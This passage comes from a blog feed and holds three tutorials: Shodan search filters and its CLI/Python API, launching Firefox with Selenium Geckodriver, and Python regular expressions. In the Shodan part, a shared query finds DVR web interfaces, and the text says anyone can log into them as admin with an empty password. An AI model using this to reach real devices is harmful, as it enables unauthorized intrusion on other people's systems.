<code>country:&quot;CN&quot;</code></li><li><code>city</code>: search by city, e.g. <code>city:&quot;Hefei&quot;</code></li><li><code>org</code>: search by organization or company, e.g. <code>org:&quot;google&quot;</code></li><li><code>isp</code>: search by ISP, e.g. <code>isp:&quot;China Telecom&quot;</code></li><li><code>product</code>: search by operating system/software/platform, e.g. <code>product:&quot;Apache httpd&quot;</code></li><li><code>version</code>: search by software version, e.g. <code>version:&quot;1.6.2&quot;</code></li><li><code>geo</code>: search by geographic location, given as latitude and longitude, e.g. <code>geo:&quot;31.8639, 117.2808&quot;</code></li><li><code>before/after</code>: search for data indexed before or after a given date, in dd-mm-yy format, e.g. <code>before:&quot;11-11-15&quot;</code></li><li><code>net</code>: search for an IP address or subnet, e.g. <code>net:&quot;210.45.240.0/24&quot;</code></li></ul><h3 id="搜索实例"><a href="#搜索实例" class="headerlink" title="搜索实例"></a>Search examples</h3><p>Find Apache servers located in Hefei:</p><pre><code>apache city:&quot;Hefei&quot;</code></pre><p>Find Nginx servers located in China:</p><pre><code>nginx country:&quot;CN&quot;</code></pre><p>Find GWS (Google Web Server) servers:</p><pre><code>&quot;Server: gws&quot; hostname:&quot;google&quot;</code></pre><p>Find Huawei devices in a given subnet:</p><pre><code>huawei net:&quot;61.191.146.0/24&quot;</code></pre><p>As shown above, adding filter keywords after a basic keyword quickly surfaces the content we are interested in. There is also a quicker and more entertaining way: click the “Explore” button to the right of the Shodan search bar to see many search queries shared by other users. What is interesting about other people's queries? Let's take a look:</p><p><a href="http://image.3001.net/images/20161128/14803150204500.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803150204500.png!small" alt="27-3.png"></a></p><p>Let's pick a user-shared query named “NetSureveillance Web”. The description beneath it makes it fairly clear that this is a weak-password vulnerability. To make testing easier, we add a country filter to the query, which gives:</p><pre><code>Server: uc-httpd 1.0.0 200 OK Country:&quot;CN&quot;</code></pre><p><a href="http://image.3001.net/images/20161128/14803150355281.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803150355281.png!small" alt="27-4.png"></a></p><p>Now open any one of the resulting pages; logging in with the admin account and an empty password works :)</p><p><a href="http://image.3001.net/images/20161128/1480315053949.png" 
target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/1480315053949.png!small" alt="27-5.png"></a></p><h3 id="其他功能"><a href="#其他功能" class="headerlink" title="其他功能"></a>Other features</h3><p>Shodan can do more than find network devices; it has several other useful features.</p><p>Exploits: after a query, click the “Exploits” button on the page and Shodan looks up available exploits for different platforms and types. You can also search directly at <a href="https://exploits.shodan.io/welcome" target="_blank" rel="noopener">https://exploits.shodan.io/welcome</a>;</p><p><a href="http://image.3001.net/images/20161128/14803151039105.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803151039105.png!small" alt="27-10.png"></a></p><p>Maps: after a query, click the “Maps” button on the page and Shodan visualizes the results on a map;</p><p><a href="http://image.3001.net/images/20161128/14803151185705.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803151185705.png!small" alt="27-12.png"></a></p><p>Reports: after a query, click the “Create Report” button on the page and Shodan generates a polished report, a real help for anyone who has to write documentation every day;</p><p><a href="http://image.3001.net/images/20161128/14803151323230.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803151323230.png!small" alt="27-11.png"></a></p><h2 id="命令行下使用-Shodan"><a href="#命令行下使用-Shodan" class="headerlink" title="命令行下使用 Shodan"></a>Using Shodan from the command line</h2><p><code>shodan</code> is the official Python library, which also provides the command-line tool. The project is hosted at <a href="https://github.com/achillean/shodan-python" target="_blank" rel="noopener">https://github.com/achillean/shodan-python</a></p><p><strong>Installation</strong></p><pre><code>pip install shodan</code></pre><p>or</p><pre><code>git clone https://github.com/achillean/shodan-python.git &amp;&amp; cd shodan-python
python setup.py install</code></pre><p>After installation, start by looking at the help output:</p><pre><code>➜  ~ shodan -h
Usage: shodan [OPTIONS] COMMAND [ARGS]...

Options:
  -h, --help  Show this message and exit.

Commands:
  alert       Manage the network alerts for your account  # manage the account's network alerts
  convert     Convert the given input data file into a...  # convert an input file
  count       Returns the number of results for a search  # return the number of results for a query
  download    Download search results and save them in a...  # download query results to a file
  honeyscore  Check whether the IP is a honeypot or not.  # check whether an IP is a honeypot
  host        View all available information for an IP...  # show all available details for an IP
  info        Shows general information about your account  # show general account information
  init        Initialize the Shodan command-line  # initialize the command-line tool
  myip        Print your external IP address  # print your current public IP
  parse       Extract information out of compressed JSON...  # parse compressed JSON data, i.e. data fetched with download
  scan        Scan an IP/ netblock using Shodan.  # scan an IP or netblock with Shodan
  search      Search the Shodan database  # query the Shodan database
  stats       Provide summary information about a search...  # summarize the results of a search
  stream      Stream data in real-time.  # display streaming data in real time</code></pre><h3 id="常用示例"><a href="#常用示例" class="headerlink" title="常用示例"></a>Common examples</h3><p><strong>init</strong></p><p>Initialize the command-line tool.</p><pre><code>➜  ~ shodan init [API_Key]
Successfully initialized</code></pre><p><strong>count</strong> </p><p>Return the number of results for a query.</p><pre><code>➜  ~ shodan count microsoft iis 6.0
575862</code></pre><p><strong>download</strong> </p><p>Download the search results to a file. Each line of the file holds the banner information of one target, stored as JSON. By default the command downloads only 1000 results; to download more, add the <code>--limit</code> option.</p><p><a href="http://image.3001.net/images/20161128/14803151703857.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803151703857.png!small" alt="27-6.png"></a></p><p><strong>parse</strong></p><p>Use parse to process previously downloaded data. It can filter out the fields you are interested in, convert the downloaded data from JSON to CSV or other formats, and feed a pipeline into other processing scripts. For example, to print the IP address, port, and organization name from the data downloaded above in CSV format:</p><pre><code>➜  ~ shodan parse --fields ip_str,port,org --separator , microsoft-data.json.gz</code></pre><p><a href="http://image.3001.net/images/20161128/1480315189686.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/1480315189686.png!small" 
alt="27-7.png"></a></p><p><strong>host</strong></p><p>Show information about a given host, such as its geolocation, open ports, and even whether it has certain vulnerabilities.</p><p><a href="http://image.3001.net/images/20161128/14803152025933.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803152025933.png!small" alt="27-8.png"></a></p><p><strong>search</strong></p><p>Print the query results directly on the command line. By default only the IP, port, hostname, and HTTP data are shown. Use <code>--fields</code> to customize the output; for example, to show only the IP, port, organization name, and hostnames:</p><pre><code>➜  ~ shodan search --fields ip_str,port,org,hostnames microsoft iis 6.0</code></pre><p><a href="http://image.3001.net/images/20161128/14803152181807.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803152181807.png!small" alt="27-9.png"></a></p><h2 id="代码中使用-Shodan-库"><a href="#代码中使用-Shodan-库" class="headerlink" title="代码中使用 Shodan 库"></a>Using the Shodan library in code</h2><p>This section uses the same <a href="https://github.com/achillean/shodan-python" target="_blank" rel="noopener"><code>shodan</code></a> library as the previous section, so installation is not repeated here. As before, the API connection must be initialized before the <code>shodan</code> library can be used:</p><pre><code>import shodan

SHODAN_API_KEY = &quot;API_Key&quot;
api = shodan.Shodan(SHODAN_API_KEY)</code></pre><p>After that we can search for data. A sample snippet:</p><pre><code>try:
    # Search Shodan
    results = api.search(&#39;apache&#39;)
    # Show the results
    print(&#39;Results found: %s&#39; % results[&#39;total&#39;])
    for result in results[&#39;matches&#39;]:
        print(result[&#39;ip_str&#39;])
except shodan.APIError as e:
    print(&#39;Error: %s&#39; % e)</code></pre><p><a href="http://image.3001.net/images/20161128/14803152351577.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803152351577.png!small" alt="27-13.png"></a></p><p>Here <code>Shodan.search()</code> returns JSON data of roughly the following form:</p><pre><code>{
        &#39;total&#39;: 8669969,
        &#39;matches&#39;: [
                {
                        &#39;data&#39;: &#39;HTTP/1.0 200 OK\r\nDate: Mon, 08 Nov 2010 05:09:59 GMT\r\nSer...&#39;,
                        &#39;hostnames&#39;: [&#39;pl4t1n.de&#39;],
                        &#39;ip&#39;: 3579573318,
                        &#39;ip_str&#39;: &#39;89.110.147.239&#39;,
                        &#39;os&#39;: &#39;FreeBSD 4.4&#39;,
                        &#39;port&#39;: 80,
                        &#39;timestamp&#39;: &#39;2014-01-15T05:49:56.283713&#39;
                },
                ...
        ]
}</code></pre><h3 id="常用-Shodan-库函数"><a href="#常用-Shodan-库函数" class="headerlink" title="常用 Shodan 库函数"></a>Common Shodan library functions</h3><ul><li><code>shodan.Shodan(key)</code>: initialize the API connection</li><li><code>Shodan.count(query, facets=None)</code>: return the number of results for a query</li><li><code>Shodan.host(ip, history=False)</code>: return detailed information about an IP</li><li><code>Shodan.ports()</code>: return the port numbers that Shodan can query</li><li><code>Shodan.protocols()</code>: return the protocols that Shodan can query</li><li><code>Shodan.services()</code>: return the services that Shodan can query</li><li><code>Shodan.queries(page=1, sort=&#39;timestamp&#39;, order=&#39;desc&#39;)</code>: list the search queries shared by other users</li><li><code>Shodan.scan(ips, force=False)</code>: scan with Shodan; ips may be a string or a dict</li><li><code>Shodan.search(query, page=1, limit=None, offset=None, facets=None, minify=True)</code>: query Shodan data</li></ul>]]></content>
      
      
      <categories>
          
          <category> Shodan </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Shodan </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Launch Firefox with GeckoDriver (latest)</title>
      <link href="/Coderzgh.github.io/2019/05/16/python-crawler-webdrive-firefox/"/>
      <url>/Coderzgh.github.io/2019/05/16/python-crawler-webdrive-firefox/</url>
      
        <content type="html"><![CDATA[<h1 id="Launch-Firefox-with-GeckoDriver-latest"><a href="#Launch-Firefox-with-GeckoDriver-latest" class="headerlink" title="Launch Firefox with GeckoDriver (latest)"></a>Launch Firefox with GeckoDriver (latest)</h1><p>This article provides a detailed, step by step guide on how to launch  Firefox with Selenium Geckodriver. In this article we use the latest  versions of Selenium, Firefox &amp; Geckodriver and show you how you can  launch Firefox by providing updated code snippets. The tool versions  that we will be using in this article are –</p><ul><li><strong>Selenium</strong> – version 3.11.0</li><li><strong>Firefox</strong> – version 59.0.2 (Firefox Quantum)</li><li><strong>Geckodriver</strong> – version 0.20.1</li></ul><p><strong>Are you using an older version of Selenium Webdriver?</strong> Make sure you switch to the <a href="http://www.automationtestinghub.com/selenium-3/" target="_blank" rel="noopener"><strong>latest Selenium Webdriver version</strong></a> to avoid compatibility issues!!</p><p><img src="http://www.automationtestinghub.com/images/selenium/launch-firefox-with-geckodriver.png" alt="Launch Firefox with Selenium 3.0"></p><h2 id="What-is-Selenium-Geckodriver"><a href="#What-is-Selenium-Geckodriver" class="headerlink" title="What is Selenium Geckodriver?"></a>What is Selenium Geckodriver?</h2><p>Let us first start with the very basics – What is Gecko and  GeckoDriver? Gecko is a web browser engine used in many applications  developed by Mozilla Foundation and the Mozilla Corporation, most  noticeably the Firefox web browser, its mobile version other than iOS  devices, their email client Thunderbird and many other open source  software projects. 
You can get more information about Gecko here – <a href="https://en.wikipedia.org/wiki/Gecko_(software)" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/Gecko_(software)</a></p><p><strong>Geckodriver is a proxy for using W3C WebDriver-compatible clients to interact with Gecko-based browsers, i.e. Mozilla Firefox in this case.</strong> This program provides the HTTP API described by the WebDriver protocol to communicate with Gecko browsers. It translates calls into the Marionette automation protocol by acting as a proxy between the local and remote ends.</p><h2 id="How-things-worked-before-Geckodriver-and-Selenium-3"><a href="#How-things-worked-before-Geckodriver-and-Selenium-3" class="headerlink" title="How things worked before Geckodriver and Selenium 3"></a>How things worked before Geckodriver and Selenium 3</h2><p>If you are new to Selenium and started directly with Selenium 3.x, you may not know how Firefox was launched with earlier versions of Selenium (version 2.53 and before). It was a pretty straightforward process in which you were not required to use Geckodriver or any other driver. After you <a href="http://www.automationtestinghub.com/download-and-install-selenium/" target="_blank" rel="noopener">download and install Selenium</a>, you just write the code to instantiate the WebDriver and open Firefox. 
The code snippet is shown below –</p><pre><code>import org.openqa.selenium.WebDriver;
import org.openqa.selenium.firefox.FirefoxDriver;

public class FirefoxTest {
    public static void main(String[] args) {
        // Selenium 2.53 and before: no separate driver executable is needed
        WebDriver driver = new FirefoxDriver();
        driver.get(&quot;http://www.google.com&quot;);
    }
}</code></pre><p>If you run this code, you will see the Firefox browser open and display <a href="http://Google.com" target="_blank" rel="noopener">Google.com</a>. This is how it worked with Selenium 2.53 and before. Let’s see what the new implementation looks like in Selenium 3.</p><h2 id="What-happens-when-you-don’t-use-Firefox-Geckodriver-with-Selenium-3-x"><a href="#What-happens-when-you-don’t-use-Firefox-Geckodriver-with-Selenium-3-x" class="headerlink" title="What happens when you don’t use Firefox Geckodriver with Selenium 3.x"></a>What happens when you don’t use Firefox Geckodriver with Selenium 3.x</h2><p>To try this out, all you need to do is point your JAR files to the latest version of Selenium 3 and then run the same code that is given above. You will notice that the <a href="http://Google.com" target="_blank" rel="noopener">Google.com</a> page does not open in a new Firefox window. Instead you will see an error message as shown below –</p><blockquote><p><strong>java.lang.IllegalStateException: The path to the  driver executable must be set by the webdriver.gecko.driver system  property; for more information, see <a href="https://github.com/mozilla/geckodriver" target="_blank" rel="noopener">https://github.com/mozilla/geckodriver</a>. 
The latest version can be downloaded from <a href="https://github.com/mozilla/geckodriver/releases" target="_blank" rel="noopener">https://github.com/mozilla/geckodriver/releases</a></strong></p></blockquote><p><img src="http://www.automationtestinghub.com/images/selenium/webdriver-gecko-driver-error.png" alt="Geckodriver Error"></p><p>You will need to use Selenium Geckodriver to remove this error. Let us see how this can be done.</p><h2 id="How-to-use-Selenium-Geckodriver-to-launch-Firefox"><a href="#How-to-use-Selenium-Geckodriver-to-launch-Firefox" class="headerlink" title="How to use Selenium Geckodriver to launch Firefox"></a>How to use Selenium Geckodriver to launch Firefox</h2><p>To launch Firefox with Selenium Geckodriver, you will first need to  download Geckodriver and then set its path. This can be done in two ways  as depicted in the below image – </p><p><img src="http://www.automationtestinghub.com/images/selenium/process-to-use-geckodriver.png" alt="Process to use Geckodriver"></p><h2 id="Check-if-Firefox-is-32-bit-or-64-bit"><a href="#Check-if-Firefox-is-32-bit-or-64-bit" class="headerlink" title="Check if Firefox is 32-bit or 64-bit"></a>Check if Firefox is 32-bit or 64-bit</h2><p><strong>There are two versions of Geckodriver for Windows: 32-bit and 64-bit</strong>.  Based on whether your Firefox is 32-bit or 64-bit, you need to download  the corresponding Geckodriver exe. In this section, you will first  check whether your Firefox is 32-bit or 64-bit</p><p><strong>1.</strong> Open Firefox on your machine. 
Click on Hamburger icon from the right corner to open the menu as shown below</p><p><img src="http://www.automationtestinghub.com/images/selenium/firefox-hamburger-icon-menu.png" alt="Open Firefox Menu"></p><p><strong>2.</strong> From this menu, click on Help icon (Help icon is marked in red box in the above image)</p><p><strong>3.</strong> Once you click on Help icon, the <strong>Help Menu</strong> would be displayed</p><p><img src="http://www.automationtestinghub.com/images/selenium/firefox-help-menu.png" alt="Help Menu - Firefox"></p><p><strong>4.</strong> Click on <strong>About Firefox</strong> from the Help menu. <strong>About Mozilla Firefox</strong> popup would be displayed</p><p><img src="http://www.automationtestinghub.com/images/selenium/about-mozilla-firefox-check-firefox-version-59.png" alt="Check if Mozilla Firefox is 32-bit or 64-bit"></p><p><strong>5.</strong> Note down whether Firefox is 32 or 64 bit. <strong>For us, Firefox is 64-bit as shown in the above image.</strong> Now close this popup and close Firefox as well.</p><h2 id="Download-the-latest-version-of-Selenium-Geckodriver"><a href="#Download-the-latest-version-of-Selenium-Geckodriver" class="headerlink" title="Download the latest version of Selenium Geckodriver"></a>Download the latest version of Selenium Geckodriver</h2><p>Follow the steps given below to download Geckodriver –</p><p><strong>1.</strong> Open this Github page – <a href="https://github.com/mozilla/geckodriver/releases" target="_blank" rel="noopener">https://github.com/mozilla/geckodriver/releases</a></p><p><strong>2.</strong> Download the latest release (windows version) based on whether your Firefox is 32-bit or 64-bit. 
We are downloading <strong>geckodriver-v0.20.1-win64.zip</strong>, as we have 64-bit Firefox</p><p><img src="http://www.automationtestinghub.com/images/selenium/download-geckodriver-latest-version.png" alt="Download latest version of GeckoDriver"></p><p><strong>3.</strong> Once the zip file is downloaded, unzip it to retrieve the driver – geckodriver.exe</p><p>This completes the downloading process. Now let’s see how you can use it in your project. There are two ways to configure this driver in your project, and you can use either of them.</p><p>According to this <a href="http://gs.statcounter.com/browser-market-share" target="_blank" rel="noopener">statcounter report</a>, Chrome is by far the most used browser. If you are learning Selenium, <a href="http://www.automationtestinghub.com/selenium-chromedriver/" target="_blank" rel="noopener"><strong>make sure that you run your scripts on Chrome browser as well</strong></a></p><h2 id="Launch-Firefox-Method-1-webdriver-gecko-driver-system-property"><a href="#Launch-Firefox-Method-1-webdriver-gecko-driver-system-property" class="headerlink" title="Launch Firefox Method 1 : webdriver.gecko.driver system property"></a>Launch Firefox Method 1 : webdriver.gecko.driver system property</h2><p>With this method, you will have to add an additional line of code in your test case. Follow the steps given below to use this method – </p><p><strong>1.</strong> Copy the entire path where you unzipped geckodriver.exe. Let us assume that the location is – D:\Firefox\geckodriver.exe. You will need to add <strong>System.setProperty</strong> with the driver location to your code.</p><p>The code to launch Firefox browser would look like this – </p><p><strong>Important Note 1:</strong> In the folder paths in the below code, we have used a double backslash (\\). This is because Java treats a single backslash (\) as an escape character. 
So you would need to use a double backslash everywhere you add a folder path.</p><pre><code>import org.openqa.selenium.WebDriver;
import org.openqa.selenium.firefox.FirefoxDriver;

public class FirefoxTest {
    public static void main(String[] args) {
        // Tell Selenium where the Geckodriver executable is located
        System.setProperty(&quot;webdriver.gecko.driver&quot;, &quot;D:\\Firefox\\geckodriver.exe&quot;);
        WebDriver driver = new FirefoxDriver();
        driver.get(&quot;http://www.google.com&quot;);
    }
}</code></pre><p><strong>Important Note 2:</strong> If you are using older versions of Geckodriver (v0.16.1 or before), then you will also need to provide the Firefox binary, otherwise you might get the below error – </p><p><em>org.openqa.selenium.SessionNotCreatedException: Expected browser  binary location, but unable to find binary in default location, no  ‘moz:firefoxOptions.binary’ capability provided, and no binary flag set  on the command line</em></p><p><strong>But please note that this is needed only for Geckodriver v0.16.1 or before.</strong> So for older Geckodriver versions, please use the below code, where the Firefox binary location is provided through the FirefoxOptions class.</p><pre><code>import org.openqa.selenium.WebDriver;
import org.openqa.selenium.firefox.FirefoxDriver;
import org.openqa.selenium.firefox.FirefoxOptions;

public class FirefoxTest {
    public static void main(String[] args) {
        System.setProperty(&quot;webdriver.gecko.driver&quot;, &quot;D:\\Firefox\\geckodriver.exe&quot;);
        FirefoxOptions options = new FirefoxOptions();
        // This is the location where you have installed Firefox on your machine
        options.setBinary(&quot;C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe&quot;);
        WebDriver driver = new FirefoxDriver(options);
        driver.get(&quot;http://www.google.com&quot;);
    }
}</code></pre><p><strong>3.</strong> Run this code to verify that everything is working fine. You will notice that <a href="http://google.com" target="_blank" rel="noopener">google.com</a> opens in a new Firefox window</p><h3 id="Launch-Firefox-Method-2-Set-property-in-Environment-Variables"><a href="#Launch-Firefox-Method-2-Set-property-in-Environment-Variables" class="headerlink" title="Launch Firefox Method 2 : Set property in Environment Variables"></a>Launch Firefox Method 2 : Set property in Environment Variables</h3><p><strong>1.</strong> Copy the entire folder location where geckodriver.exe is saved. If the entire path is D:\Firefox\geckodriver.exe, then the folder location would be D:\Firefox\</p><p><strong>2.</strong> Open the Advanced tab in the System Properties window as shown in the below image.</p><p><img src="http://www.automationtestinghub.com/images/selenium/system-properties.png" alt="System Properties"></p><p><strong>3.</strong> Open Environment Variables window. 
</p><p><img src="http://www.automationtestinghub.com/images/selenium/environment-variables-section.png" alt="Environment Variables Window"></p><p><strong>4.</strong> In System variables section, select the Path variable  (highlighted in the above image) and click on Edit button. Then add the  location of Geckodriver that we copied in step 1 (D:\Firefox), to path  variable (below image shows UI for Windows 10)</p><p><img src="http://www.automationtestinghub.com/images/selenium/add-geckodriver-path-to-environment-variables.png" alt="Add GeckoDriver path to Environment Variables"></p><p><strong>5.</strong> If you are using Windows 7, then move to the end of the  Variable value field, then add a semi-colon (;) and then add the folder  location as shown below (Semicolon acts as a separator between multiple  values in the field)</p><p><img src="http://www.automationtestinghub.com/images/selenium/add-geckodriver-location-in-path-variable.png" alt="Add GeckoDriver in Path Variable - Windows 7"></p><p><strong>6.</strong> Click on Ok button to close the windows. Once the path is  set, you would not need to set the System property every time in the  test script. 
Your test script would simply look like this – </p><p><strong>For GeckoDriver v0.20, v0.19.0, v0.18.0 and v0.17.0 –</strong> </p><p>public class FirefoxTest {          public static void main(String[] args) {         WebDriver driver = new FirefoxDriver();         driver.get(“<a href="http://www.google.com&quot;)" target="_blank" rel="noopener">http://www.google.com&quot;)</a>;     } }</p><table><thead><tr><th>1234567</th><th>public class FirefoxTest {        public static void main(String[] args) {        WebDriver driver = new FirefoxDriver();        driver.get(“<a href="http://www.google.com" target="_blank" rel="noopener">http://www.google.com</a>“);    }}</th></tr></thead><tbody><tr><td></td></tr></tbody></table><p> <strong>For GeckoDriver v0.16.1 or before –</strong> </p><p>public class FirefoxTest {          public static void main(String[] args) {         FirefoxOptions options = new FirefoxOptions();         options.setBinary(“C:\Program Files (x86)\Mozilla Firefox\firefox.exe”); //This is the location where you have installed Firefox on your machine          WebDriver driver = new FirefoxDriver(options);         driver.get(“<a href="http://www.google.com&quot;)" target="_blank" rel="noopener">http://www.google.com&quot;)</a>;     } }</p><table><thead><tr><th>12345678910</th><th>public class FirefoxTest {        public static void main(String[] args) {        FirefoxOptions options = new FirefoxOptions();        options.setBinary(“C:\Program Files (x86)\Mozilla Firefox\firefox.exe”); //This is the location where you have installed Firefox on your machine         WebDriver driver = new FirefoxDriver(options);        driver.get(“<a href="http://www.google.com" target="_blank" rel="noopener">http://www.google.com</a>“);    }}</th></tr></thead><tbody><tr><td></td></tr></tbody></table><p><strong>7.</strong> Run the code to check that it works fine.</p><p> This completes our article on how you can use launch Firefox with  Selenium GeckoDriver. 
Try it out and let us know if this worked for you.  <strong>Feel free to contact us using comments section if you face any issue while implementing this.</strong></p><p> <strong>UPDATE 1 [30 April, 2017]:</strong> Use DesiredCapabilities and FirefoxOptions to launch Firefox with Selenium GeckoDriver</p><p>public class FirefoxTest {          public static void main(String[] args) {         FirefoxOptions options = new FirefoxOptions();         options.setBinary(“C:\Program Files (x86)\Mozilla Firefox\firefox.exe”); //Location where Firefox is installed          DesiredCapabilities capabilities = DesiredCapabilities.firefox();         capabilities.setCapability(“moz:firefoxOptions”, options);         //set more capabilities as per your requirements          FirefoxDriver driver = new FirefoxDriver(capabilities);         driver.get(“<a href="http://www.google.com&quot;)" target="_blank" rel="noopener">http://www.google.com&quot;)</a>;     } }</p><table><thead><tr><th>1234567891011121314</th><th>public class FirefoxTest {        public static void main(String[] args) {        FirefoxOptions options = new FirefoxOptions();        options.setBinary(“C:\Program Files (x86)\Mozilla Firefox\firefox.exe”); //Location where Firefox is installed         DesiredCapabilities capabilities = DesiredCapabilities.firefox();        capabilities.setCapability(“moz:firefoxOptions”, options);        //set more capabilities as per your requirements         FirefoxDriver driver = new FirefoxDriver(capabilities);        driver.get(“<a href="http://www.google.com" target="_blank" rel="noopener">http://www.google.com</a>“);    }}</th></tr></thead><tbody><tr><td></td></tr></tbody></table><p><strong>Here are a few hand-picked articles for you to read next:</strong></p><ul><li><a href="http://www.automationtestinghub.com/selenium-headless-chrome-firefox/" target="_blank" rel="noopener">Learn how to launch firefox in headless mode with Selenium</a></li><li><a 
href="http://www.automationtestinghub.com/disable-firefox-logs-selenium/" target="_blank" rel="noopener">Disable low level console logs when you run your tests on Firefox</a></li><li><a href="http://www.automationtestinghub.com/cucumber-selenium-testing-tutorial/" target="_blank" rel="noopener">Add the power of Cucumber BDD to your test scripts</a></li></ul>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Firefox </tag>
            
            <tag> Webdriver </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python Web Crawler in Practice, Part 5: Regular Expressions</title>
      <link href="/Coderzgh.github.io/2019/05/15/python-crawler-regular-expression-5/"/>
      <url>/Coderzgh.github.io/2019/05/15/python-crawler-regular-expression-5/</url>
      
        <content type="html"><![CDATA[<h2 id="正文："><a href="#正文：" class="headerlink" title="Main text"></a>Main text</h2>
<p>A regular expression describes a pattern for matching strings. It can be used to check whether a string contains a given substring, to replace matched substrings, or to extract the substrings that satisfy some condition.</p>
<h2 id="通过一个小实例来了解正则表达式的作用"><a href="#通过一个小实例来了解正则表达式的作用" class="headerlink" title="A small example of what regular expressions do"></a>A small example of what regular expressions do</h2>
<pre><code># Find every &#39;abc&#39; and every run of digits in the string s
import re
s = &#39;123abc456eabc789&#39;
re.findall(r&#39;abc&#39;, s)
# result: [&#39;abc&#39;, &#39;abc&#39;]
re.findall(&#39;[0-9]+&#39;, s)
# result: [&#39;123&#39;, &#39;456&#39;, &#39;789&#39;]</code></pre>
<h2 id="限定符"><a href="#限定符" class="headerlink" title="Quantifiers"></a>Quantifiers</h2>
<p>A quantifier specifies how many times a given component of a regular expression must occur for the match to succeed. There are six of them: *, +, ?, {n}, {n,} and {n,m}.</p>
<p><img src="https:////upload-images.jianshu.io/upload_images/2255795-ae6d73e71049b6bb.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1000" alt="img"></p>
<pre><code>import re
s = &#39;Chapter1 Chapter2 Chapter10 Chapter99 fheh&#39;
re.findall(&#39;Chapter[1-9][0-9]*&#39;, s)
# result: [&#39;Chapter1&#39;, &#39;Chapter2&#39;, &#39;Chapter10&#39;, &#39;Chapter99&#39;]
re.findall(&#39;Chapter[1-9][0-9]+&#39;, s)
# result: [&#39;Chapter10&#39;, &#39;Chapter99&#39;]
re.findall(&#39;Chapter[1-9][0-9]?&#39;, s)
# result: [&#39;Chapter1&#39;, &#39;Chapter2&#39;, &#39;Chapter10&#39;, &#39;Chapter99&#39;]
re.findall(&#39;Chapter[1-9][0-9]{0,1}&#39;, s)
# result: [&#39;Chapter1&#39;, &#39;Chapter2&#39;, &#39;Chapter10&#39;, &#39;Chapter99&#39;]
re.findall(&#39;Chapter[1-9][0-9]{1,2}&#39;, s)
# result: [&#39;Chapter10&#39;, &#39;Chapter99&#39;]</code></pre>
<h2 id="贪婪匹配与非贪婪匹配"><a href="#贪婪匹配与非贪婪匹配" class="headerlink" title="Greedy and non-greedy matching"></a>Greedy and non-greedy matching</h2>
<p>Regex matching is greedy by default, that is, it matches as many characters as possible.</p>
<pre><code>import re
# greedy mode
s = &#39;&lt;H1&gt;Chapter 1 – Introduction to Regular Expressions&lt;/H1&gt;&#39;
re.findall(&#39;&lt;.*&gt;&#39;, s)
# result: [&#39;&lt;H1&gt;Chapter 1 – Introduction to Regular Expressions&lt;/H1&gt;&#39;]
# non-greedy mode
re.findall(&#39;&lt;.*?&gt;&#39;, s)
# result: [&#39;&lt;H1&gt;&#39;, &#39;&lt;/H1&gt;&#39;]</code></pre>
<h2 id="定位符"><a href="#定位符" class="headerlink" title="Anchors"></a>Anchors</h2>
<p>Anchors let you pin a regular expression to the start or end of a line. They also let you write expressions that match inside a word, at the beginning of a word, or at the end of a word.</p>
<p>Anchors describe the boundaries of a string or a word: ^ and $ refer to the start and end of the string, \b describes a word boundary (before or after a word), and \B a non-word boundary.</p>
<p><img src="https:////upload-images.jianshu.io/upload_images/2255795-53ebbb5379727d24.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1000" alt="img"></p>
<pre><code>import re
s = &#39;Chapter1 Chapter2 Chapter11 Chapter99&#39;
re.findall(&#39;^Chapter[1-9][0-9]{0,1}&#39;, s)
# result: [&#39;Chapter1&#39;]
re.findall(&#39;^Chapter[1-9][0-9]{0,1}$&#39;, &#39;Chapter99&#39;)
# result: [&#39;Chapter99&#39;]
re.findall(r&#39;\bCha&#39;, &#39; Chapter&#39;)
# result: [&#39;Cha&#39;]
re.findall(r&#39;ter\b&#39;, &#39; Chapter&#39;)
# result: [&#39;ter&#39;]
re.findall(r&#39;\Bapt&#39;, &#39;Chapter&#39;)
# result: [&#39;apt&#39;]
re.findall(r&#39;\Bapt&#39;, &#39;aptitude&#39;)
# result: []</code></pre>
<h2 id="分组与捕获组"><a href="#分组与捕获组" class="headerlink" title="Groups and capturing groups"></a>Groups and capturing groups</h2>
<p>To explain capturing, start with grouping. A quantifier repeats a single character; to repeat a whole string, wrap it in parentheses. The parentheses enclose a subexpression (substring), and that is a group. You can then apply a quantifier to the whole subexpression.</p>
<p>So what is capturing? Once a subexpression is marked with parentheses, the text it matches can be reused later in the expression or in other processing. To refer to it you need a handle: by default every group (pair of parentheses) automatically gets a group number, assigned from left to right by the position of its opening parenthesis, starting at 1 and incrementing. Nested groups follow the same rule: they are numbered in the order of their opening parentheses.</p>
<pre><code>import re
s = &#39;aaa111aaa , bbb222 , 333ccc&#39;
re.findall(r&#39;[a-z]+(\d+)[a-z]&#39;, s)
# result: [&#39;111&#39;]
re.findall(r&#39;[a-z]+\d+[a-z]&#39;, s)  # compare with the (\d+) version
# result: [&#39;aaa111a&#39;]
re.findall(r&#39;[a-z]+\d+[a-z]+&#39;, s)  # compare with the (\d+) version
# result: [&#39;aaa111aaa&#39;]
s = &#39;111aaa222aaa111 , 333bbb444bb33&#39;
re.findall(r&#39;(\d+)([a-z]+)(\d+)(\2)(\1)&#39;, s)
# result: [(&#39;111&#39;, &#39;aaa&#39;, &#39;222&#39;, &#39;aaa&#39;, &#39;111&#39;)]
re.findall(r&#39;(\d+)([a-z]+)(\d+)(\2)(\1)&#39;, &#39;333bbb444bb33&#39;)
# result: []
re.findall(r&#39;(\d+)([a-z]+)(\d+)(\2)(\1)&#39;, &#39;333bbb444bbb333&#39;)
